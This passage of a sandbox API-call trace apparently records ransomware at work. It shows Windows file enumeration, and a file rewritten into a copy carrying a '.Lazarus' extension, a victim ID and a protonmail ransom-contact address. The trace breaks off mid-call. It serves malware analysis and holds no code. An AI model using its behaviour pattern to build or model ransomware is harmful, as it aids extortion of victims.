RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0068.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0068.989] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.990] GetFileType (hFile=0x410) returned 0x1 [0068.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0068.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0068.991] GetLastError () returned 0xb7 [0068.991] SetLastError (dwErrCode=0xb7) [0068.991] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0068.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0068.992] CloseHandle (hObject=0x410) returned 1 [0068.992] AreFileApisANSI () returned 1 [0068.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0068.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x694e0 [0068.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x694e0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 36 [0068.992] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf")) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.993] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0068.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0068.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0068.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0068.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0068.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.994] AreFileApisANSI () returned 1 [0068.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0068.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0068.995] AreFileApisANSI () returned 1 [0068.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0068.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0068.995] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.995] GetFileType (hFile=0x410) returned 0x1 [0068.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0068.995] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.995] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.995] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.996] CloseHandle (hObject=0x410) returned 1 [0068.996] AreFileApisANSI () returned 1 [0068.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0068.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0068.996] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.996] GetFileType (hFile=0x410) returned 0x1 [0068.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0068.996] CloseHandle (hObject=0x410) returned 1 [0068.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0068.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0068.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.997] AreFileApisANSI () returned 1 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0068.997] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0)) returned 1 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0068.997] AreFileApisANSI () returned 1 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0068.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0068.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.998] GetLastError () returned 0x0 [0068.998] SetLastError (dwErrCode=0x0) [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1b8 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0068.998] GetLastError () returned 0x0 [0068.998] SetLastError (dwErrCode=0x0) [0068.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71688 [0068.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0068.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0068.998] AreFileApisANSI () returned 1 [0068.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0068.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0068.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0068.998] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.999] GetFileType (hFile=0x410) returned 0x1 [0068.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0068.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0068.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0069.259] AreFileApisANSI () returned 1 [0069.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0069.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0069.261] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.262] GetFileType (hFile=0x428) returned 0x1 [0069.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0069.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0069.264] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.265] GetLastError () returned 0x0 [0069.266] SetLastError (dwErrCode=0x0) [0069.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.266] GetLastError () returned 0x0 [0069.266] SetLastError (dwErrCode=0x0) [0069.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.271] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0069.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0069.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0069.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0069.274] GetLastError () returned 0x0 [0069.274] SetLastError (dwErrCode=0x0) [0069.274] GetLastError () returned 0x0 [0069.274] SetLastError (dwErrCode=0x0) [0069.274] GetLastError () returned 0x0 [0069.274] SetLastError (dwErrCode=0x0) [0069.275] GetLastError () returned 0x0 [0069.275] SetLastError (dwErrCode=0x0) [0069.275] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.275] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.276] GetLastError () returned 0x0 [0069.276] SetLastError (dwErrCode=0x0) [0069.276] GetLastError () returned 0x0 [0069.276] SetLastError (dwErrCode=0x0) [0069.276] GetLastError () returned 0x0 [0069.276] SetLastError (dwErrCode=0x0) [0069.276] GetLastError () returned 0x0 [0069.276] SetLastError (dwErrCode=0x0) [0069.276] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.277] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.277] GetLastError () returned 0x0 [0069.277] SetLastError (dwErrCode=0x0) [0069.277] GetLastError () returned 0x0 [0069.277] SetLastError (dwErrCode=0x0) [0069.277] GetLastError () returned 0x0 [0069.277] SetLastError (dwErrCode=0x0) [0069.277] GetLastError () returned 0x0 [0069.277] SetLastError (dwErrCode=0x0) [0069.277] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.278] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.278] GetLastError () returned 0x0 [0069.278] SetLastError (dwErrCode=0x0) [0069.278] GetLastError () returned 0x0 [0069.278] SetLastError (dwErrCode=0x0) [0069.278] GetLastError () returned 0x0 [0069.278] SetLastError (dwErrCode=0x0) [0069.278] GetLastError () returned 0x0 [0069.278] SetLastError (dwErrCode=0x0) [0069.278] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.278] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, 